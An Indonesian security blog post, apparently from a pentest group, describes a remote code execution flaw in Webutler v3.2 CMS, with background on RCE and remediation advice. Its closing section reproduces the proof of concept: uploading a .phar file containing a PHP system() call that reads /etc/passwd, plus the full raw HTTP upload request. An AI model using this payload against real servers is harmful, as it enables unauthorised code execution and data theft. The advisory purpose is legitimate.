Assalamualaikum sahabat Whitecyber semua, kali ini Whitecyber team mendapatkan project untuk melakukan LEGAL Penetration Testing pada sebuah web server. Dan tentunya ini tindakan legal karena digunakan dan diterapkan untuk mencari celah keamanan dari client whitecyber.
Webutler v3.2 adalah sebuah perangkat lunak atau aplikasi yang memiliki kerentanan keamanan serius. Kerentanan ini memungkinkan penyerang untuk melakukan Remote Code Execution (RCE).
Apa itu Remote Code Execution (RCE)?
RCE adalah jenis serangan di mana penyerang dapat menjalankan kode sembarang di server atau sistem yang rentan. Ini seperti memberikan kunci akses penuh kepada penyerang untuk mengontrol sistem Anda. Dengan kata lain, penyerang bisa melakukan apa saja yang mereka inginkan pada sistem Anda, mulai dari mencuri data, merusak sistem, hingga menggunakan sistem Anda untuk menyerang sistem lain.
Mengapa Webutler v3.2 Berbahaya?
Kerentanan RCE pada Webutler v3.2 membuat aplikasi ini menjadi target empuk bagi para hacker. Jika Anda menggunakan Webutler v3.2 dan belum melakukan tindakan perbaikan, maka sistem Anda berisiko sangat tinggi untuk diretas.
Apa yang Harus Dilakukan?
Jika Anda menggunakan Webutler v3.2, sangat disarankan untuk:
- Segera memperbarui: Pengembang Webutler kemungkinan besar telah merilis pembaruan untuk mengatasi kerentanan ini. Segera perbarui aplikasi Anda ke versi terbaru.
- Hubungi penyedia: Jika Anda tidak yakin bagaimana cara memperbarui atau jika tidak ada pembaruan yang tersedia, hubungi penyedia Webutler untuk mendapatkan bantuan.
- Tingkatkan keamanan: Selain memperbarui, Anda juga perlu meningkatkan keamanan sistem Anda secara keseluruhan. Ini termasuk menggunakan kata sandi yang kuat, mengaktifkan firewall, dan melakukan pemindaian keamanan secara berkala.
- Cari alternatif: Jika tidak ada solusi yang memuaskan, pertimbangkan untuk beralih ke aplikasi lain yang lebih aman.
Informasi Tambahan
- EDB-ID: 51660
- CVE: N/A
- Penemu: Mirabbas Ağalarov
- Platform: PHP
- Tanggal ditemukan: 2023-08-04
Sumber:
- Exploit-DB: https://www.exploit-db.com/exploits/51660
- ALLSAFE Siber Güvenlik: https://www.allsafe.com.tr/webapps-webutler-v3-2-remote-code-execution-rce/
Kesimpulan
Kerentanan RCE pada Webutler v3.2 adalah ancaman serius yang tidak boleh diabaikan. Jika Anda menggunakan aplikasi ini, segera ambil tindakan untuk mengamankan sistem Anda.
Langkah-langkah hackingnya :
Exploit Title: Webutler v3.2 – Remote Code Execution (RCE)
Application: webutler Cms
Version: v3.2
Bugs: RCE
Technology: PHP
Vendor URL: https://webutler.de/en
Software Link: http://webutler.de/download/webutler_v3.2.zip
Tested on: Linux
- Technical Details & POC
========================================
Langkah-langkah:
- login ke account sebagai admin
- ke folder media
- upload file phar
- upload file poc.phar
poc.phar file berisi :
<?php echo system(“cat /etc/passwd”);?>
- buka poc.phar file dengan me request poc :
POST /webutler_v3.2/admin/browser/index.php?upload=newfile&types=file&actualfolder=%2F&filename=poc.phar&overwrite=true HTTP/1.1
Host: localhost
Content-Length: 40
sec-ch-ua:
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
X_FILENAME: poc.phar
sec-ch-ua-platform: “”
Accept: */*
Origin: http://localhost
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost/webutler_v3.2/admin/browser/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: WEBUTLER=ekgfsfhi3ocqdvv7ukqoropolu
Connection: close
<?php echo system(“cat /etc/passwd”);?>
Solusi : Update ke Webutler terbaru.